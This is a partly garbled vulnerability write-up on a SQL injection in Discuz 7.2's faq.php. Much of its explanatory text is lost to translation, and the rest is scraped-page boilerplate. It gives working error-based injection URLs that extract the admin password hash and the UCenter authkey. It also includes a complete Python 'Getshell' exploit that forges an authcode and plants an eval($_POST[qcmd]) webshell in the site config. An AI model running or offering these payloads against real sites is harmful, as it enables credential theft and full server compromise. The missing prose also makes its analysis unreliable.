discuz /faq.php SQL Injection Vul
21930 단어 inject
1.
2.
3.
4.
5.
6.
1. 구멍 설명
1.
2. 。 cmd5.com , salt, salt "1"
: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71
: c6c45f444cf6a41b309c9401ab9a55a7:066ff7
3. uc_key shell
4. , webshell
Relevant Link:
http://sebug.net/vuldb/ssvid-87115
http://sebug.net/vuldb/ssvid-87114
2. 구멍 트리거 조건
1.
http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
2.
http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
3. key
http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
// error based injection
0x1: POC
import sys,urllib,time,math,base64,hashlib,urllib2
#contant raw
def fg(kaishi, jieshu, wenben):
start = wenben.find(kaishi);
if start >= 0:
start += len(kaishi);
jieshu = wenben.find(jieshu, start);
if jieshu >= 0:
return wenben[start:jieshu].strip();
#microtime
def microtime(get_as_float = False) :
if get_as_float:
return time.time();
else:
return '%.8f %d' % math.modf(time.time());
#authget
def get_authcode(string, key = ''):
ckey_length = 4;
key = hashlib.md5(key).hexdigest();
keya = hashlib.md5(key[0:16]).hexdigest();
keyb = hashlib.md5(key[16:32]).hexdigest();
keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:];
#keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
cryptkey = keya + hashlib.md5(keya+keyc).hexdigest();
key_length = len(cryptkey);
string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string;
string_length = len(string);
result = '';
box = range(0, 256);
rndkey = dict();
for i in range(0,256):
rndkey[i] = ord(cryptkey[i % key_length]);
j=0;
for i in range(0,256):
j = (j + box[i] + rndkey[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
a=0;
j=0;
for i in range(0,string_length):
a = (a + 1) % 256;
j = (j + box[a]) % 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]));
return keyc + base64.b64encode(result).replace('=', '');
#getshell
def get_shell(url0,key,host):
headers={'Accept-Language':'zh-cn',
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
'Referer':url0
};
tm = time.time()+10*3600;
tm="time=%d&action=updateapps" %tm;
code = urllib.quote(get_authcode(tm,key));
url0=url0+"?code="+code;
data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx\');eval($_POST[qcmd]);//</item>
</root>''';
try:
req=urllib2.Request(url0,data=data1,headers=headers);
ret=urllib2.urlopen(req);
except:
return "error to read";
data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://aaa</item>
</root>''';
try:
req=urllib2.Request(url0,data=data2,headers=headers);
ret=urllib2.urlopen(req);
except:
return "error";
return "OK: "+host+"/config.inc.php | Password = qcmd"; # /config/uc_config.php config.inc.php by niubl
#define over
#url from users
right = len(sys.argv);
if right < 2:
#note
print ("============================================================");
print ("Discuz <= 7.2 Getshell");
print ("Wrote by Airbasic");
print ("Usage: py.exe " + sys.argv[0] + " http://localhost/dz");
print ("============================================================");
raw_input("");
sys.exit()
url = sys.argv[1];
#go
url1 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";
url2 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";
#authkey1~31
wy1 = urllib.urlopen(url1);
nr1 = wy1.read();
authkey1 = fg("'1:","' for",nr1);
#authkey32~64
wy2 = urllib.urlopen(url2);
nr2 = wy2.read();
authkey2 = fg("'1:","' for",nr2);
#authkey
authkey = authkey1+authkey2;
#get username and password
#none
#over
#get webshell
url0 = url + "/api/uc.php";
host = url;
print ("Wrote by Airbasic , GetShell Ok !");
print get_shell(url0,authkey,host);
raw_input("");
Relevant Link:
http://blog.csdn.net/yiyefangzhou24/article/details/36913287
http://qqhack8.blog.163.com/blog/static/11414798520146711246279/
3. 구멍 영향 범위 4. 구멍 코드 분석
/faq.php
..
elseif($action == 'grouppermission')
{
..
// groupids, $gids( , $_GET[gids])
$groupids = array();
foreach($gids as $row)
{
// groupids
$groupids[] = $row[0];
/*
discuz GET addslashes , "'" "\'"
, : gids[1]=' , $gids[1]=\', $groupids[] = $row[0] , "\",
*/
}
/*
sql , implodeids $groupids
$groupids ',' , '1','2','3','4' 。 , ' , :'1','\','3','4'
, " ", , 3 ,
*/
$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
$groups = array();
..
Relevant Link:
http://simeon.blog.51cto.com/18680/1440000
5. 방어 방법
/faq.php
elseif($action == 'grouppermission')
{
/* $gids */
$gids = array();
/* */
Relevant Link:
http://www.crazydb.com/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXP
http://simeon.blog.51cto.com/18680/1440000
6. 공 방 사고
Copyright (c) 2015 LittleHann All rights reserved
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
struct2 원본 해독(8)의container 원리이 두 가지 방법은 모두 서로 다른 조건을 통해 용기 속의 대상을 꺼내는 것이다.컨테이너 구현 클래스의 이 방법을 보면 여기서Key 값을 통해 이factory 대상을 찾을 수 있고factory의create () 방법...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.